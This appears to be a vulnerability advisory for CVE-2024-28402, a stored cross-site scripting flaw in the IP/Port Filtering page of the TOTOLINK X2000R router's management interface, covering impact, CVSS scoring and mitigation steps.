CVE-2024-28402 identifies a stored cross-site scripting (XSS) vulnerability in the TOTOLINK X2000R wireless router firmware versions prior to V1.0.0-B20231213.1013. The vulnerability resides specifically in the IP/Port Filtering functionality located on the Firewall configuration page of the router's web-based management interface. Stored XSS means that malicious input submitted by an attacker is permanently saved by the device and later rendered in the web interface without proper sanitization or encoding. An attacker with low-level privileges and authenticated access to the router’s management interface can inject malicious JavaScript code into the IP/Port Filtering fields. When an authorized user views this page, the injected script executes in their browser context, potentially allowing session hijacking, credential theft, or further administrative actions on the router. The CVSS v3.1 vector (AV:A/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) indicates that the attack requires network access with low complexity, low privileges, and user interaction, but the scope is changed, meaning the vulnerability affects resources beyond the initially compromised component. The impact includes partial loss of confidentiality, integrity, and availability of the router’s management functions. While no public exploits or patches are currently available, the vulnerability poses a moderate risk, especially in environments where multiple users have access to router management or where the router is exposed to semi-trusted networks.

The vulnerability could allow an authenticated attacker with low privileges to execute arbitrary scripts within the router’s management interface, potentially leading to session hijacking, unauthorized configuration changes, or further compromise of the device. This can degrade the confidentiality and integrity of network management and may disrupt availability if malicious scripts alter firewall or routing rules. Organizations relying on TOTOLINK X2000R routers, especially in multi-user or semi-public environments, face risks of unauthorized access escalation and network compromise. The impact is amplified in scenarios where the router’s management interface is accessible over less secure networks or where administrative credentials are shared or weak. Although exploitation requires authentication and user interaction, the stored nature of the XSS means that multiple users could be affected once the malicious payload is injected. This could facilitate lateral movement or persistent footholds within the network infrastructure.

1. Immediately restrict access to the router’s management interface to trusted networks and users only, preferably via VPN or isolated management VLANs. 2. Enforce strong authentication policies, including unique, complex passwords and, if supported, multi-factor authentication for router access. 3. Monitor and audit user activity on the router management interface to detect suspicious input or configuration changes. 4. Avoid sharing management credentials among multiple users to limit exposure. 5. Regularly check for firmware updates from TOTOLINK and apply patches promptly once available to remediate this vulnerability. 6. As a temporary workaround, avoid using the IP/Port Filtering feature until a fix is released or sanitize inputs manually if possible. 7. Educate users with access to the router interface about the risks of clicking unknown links or executing untrusted scripts. 8. Consider network segmentation to isolate critical infrastructure from devices with known vulnerabilities.